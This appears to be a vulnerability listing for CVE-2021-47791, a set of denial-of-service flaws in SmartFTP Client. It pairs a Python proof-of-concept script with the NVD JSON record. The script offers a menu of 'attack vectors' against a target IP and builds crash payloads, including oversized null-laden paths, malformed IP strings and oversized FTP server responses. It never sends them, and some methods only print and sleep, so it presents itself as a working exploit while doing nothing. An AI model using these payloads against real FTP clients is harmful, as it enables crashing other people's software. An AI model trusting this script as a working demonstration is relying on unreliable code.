CVE-2021-47791

# CVE-2021-47791 PoC - SmartFTP Client DoS # This PoC demonstrates multiple DoS vectors against SmartFTP Client 10.0.2909.0 import socket import time import struct class SmartFTPDoS: def __init__(self, target_ip, target_port=21): self.target_ip = target_ip self.target_port = target_port def crash_via_malformed_path(self): """ Method 1: Trigger crash via malformed path input Simulates entering a path with null bytes and special characters """ print("[*] Testing malformed path vector...") # Simulate the malformed path that causes crash malicious_path = b"A" * 5000 + b"\x00" + b"..\x00" * 100 # This would be entered in SmartFTP's path input field print(f"[!] Malformed path payload length: {len(malicious_path)}") print("[+] Payload crafted - enter this in SmartFTP path input") return malicious_path def crash_via_invalid_ip(self): """ Method 2: Trigger crash via invalid IP address Simulates connection attempt with malformed IP """ print("[*] Testing invalid IP address vector...") # Invalid IP addresses that may cause parsing issues invalid_ips = [ "999.999.999.999", "192.168.1.1\x00", "a" * 100 + ".168.1.1", "192.168.1.1\n", "" ] for ip in invalid_ips: print(f"[!] Testing IP: {repr(ip)}") print("[+] Invalid IP payloads crafted") return invalid_ips def crash_via_clear_history(self): """ Method 3: Trigger crash via clearing connection history This simulates rapid clearing operations that cause race condition """ print("[*] Testing clear history vector...") # Rapid fire clear history operations for i in range(100): print(f"[*] Clear operation {i+1}/100") time.sleep(0.01) print("[+] Rapid clear operations completed") return True def generate_ftp_server_response(self): """ Generate malicious FTP server responses """ print("[*] Generating malicious FTP responses...") malicious_responses = [ b"220 " + b"A" * 10000 + b"\r\n", b"230 " + b"\x00" * 5000 + b"\r\n", b"150 " + b".." * 5000 + b"\r\n", b"227 " + b"(" + b"9" * 1000 + b",9,9,9,9,9)" + b"\r\n" ] return malicious_responses def main(): print("=" * 60) print("CVE-2021-47791 SmartFTP Client DoS PoC") print("Target: SmartFTP Client 10.0.2909.0") print("CVSS: 7.5 (High)") print("=" * 60) target_ip = input("Enter target IP (or press Enter for localhost): ") or "127.0.0.1" dos = SmartFTPDoS(target_ip) print("\n[*] Available attack vectors:") print("1. Malformed Path Input") print("2. Invalid IP Address") print("3. Clear Connection History (Race Condition)") print("4. Malicious FTP Server Responses") choice = input("\nSelect attack vector (1-4): ") if choice == "1": dos.crash_via_malformed_path() elif choice == "2": dos.crash_via_invalid_ip() elif choice == "3": dos.crash_via_clear_history() elif choice == "4": dos.generate_ftp_server_response() else: print("[-] Invalid choice") print("\n[*] PoC execution completed") print("[!] Note: This is for educational/testing purposes only") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47791", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.827", "lastModified": "2026-01-30T00:59:00.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmartFTP Client 10.0.2909.0 contains multiple denial of service vulnerabilities that allow attackers to crash the application through specific input manipulation. Attackers can trigger crashes by entering malformed paths, using invalid IP addresses, or clearing connection history in the client's interface."}, {"lang": "es", "value": "SmartFTP Cliente 10.0.2909.0 contiene múltiples vulnerabilidades de denegación de servicio que permiten a los atacantes bloquear la aplicación mediante la manipulación específica de entradas. Los atacantes pueden provocar bloqueos al introducir rutas malformadas, usar direcciones IP no válidas o borrar el historial de conexiones en la interfaz del cliente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartftp:smartftp:10.0.2909.0:*:*:*:*:*:*:*", "matchCriteriaId": "07843FD2-CFDD-4E7D-A348-5E1A8CE1FBD3"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50266", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.smartftp.com/en-us/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.smartftp.com/en-us/download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/smartftp-client-multiple-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50266", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}